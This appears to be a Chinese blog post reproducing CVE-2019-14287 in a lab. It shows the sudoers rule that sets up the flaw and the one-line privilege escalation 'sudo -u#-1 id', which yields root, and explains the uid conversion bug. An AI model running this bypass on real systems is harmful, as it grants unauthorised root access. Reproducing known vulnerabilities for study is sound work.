CVE-2019-14287复现

  • 原理
    sudo 是 Linux 系统中的一个指令,也可以把他理解成一个软件,他可以
    更快捷的使用其他用户的权限去完成某些需要高权限用户才能执行
    的操作。
  • 环境搭建
    • 1.先用sudu -V查看版本,此漏洞是Linux的1.8.28版本之前的漏洞

    • 添加一个新用户

    • 修改sudo配置文件 vim /etc/sudoers

      • 当在 sudo 的配置文件中添加了如下这条
      • admin ALL=(ALL,!root) ALL
      • 就会触发
      • 此条配置的意思是指:
      • 1. test all 代表允许 test 用户在任何主机上使用 sudo 命令.
      • 2. (all,!root)表示允许的是切换除 root 用户以外的用户执行.
      • 也就是允许 test 用户切换到任何一个除 root 用户以外的用户执行想
      • 要执行的操作
    • 当在 sudo 的配置文件中添加了如下这条
    • Test ALL=(ALL,!root) ALL
    • 切换用户su admin

  • 漏洞进行
    • sudo -u#-1 id

    • -u指定用户 然后-1他会理解成用户名没有就是0
    • usnigned int为无负号整型从零开始计算所以-1被顶成0
    • 执行到-u#-1 时漏洞触发,指定的如果 uid 等于-1,或者是一个不存在的uid 的情况时,将用户 uid 转换成用户的函数会把”-1”误认为是 0,uid=0 的用户正是最高权限 root 用户的 uid,因此就成功使用了 root 用户执行了我们想要执行的操作
  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

姜小孩.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值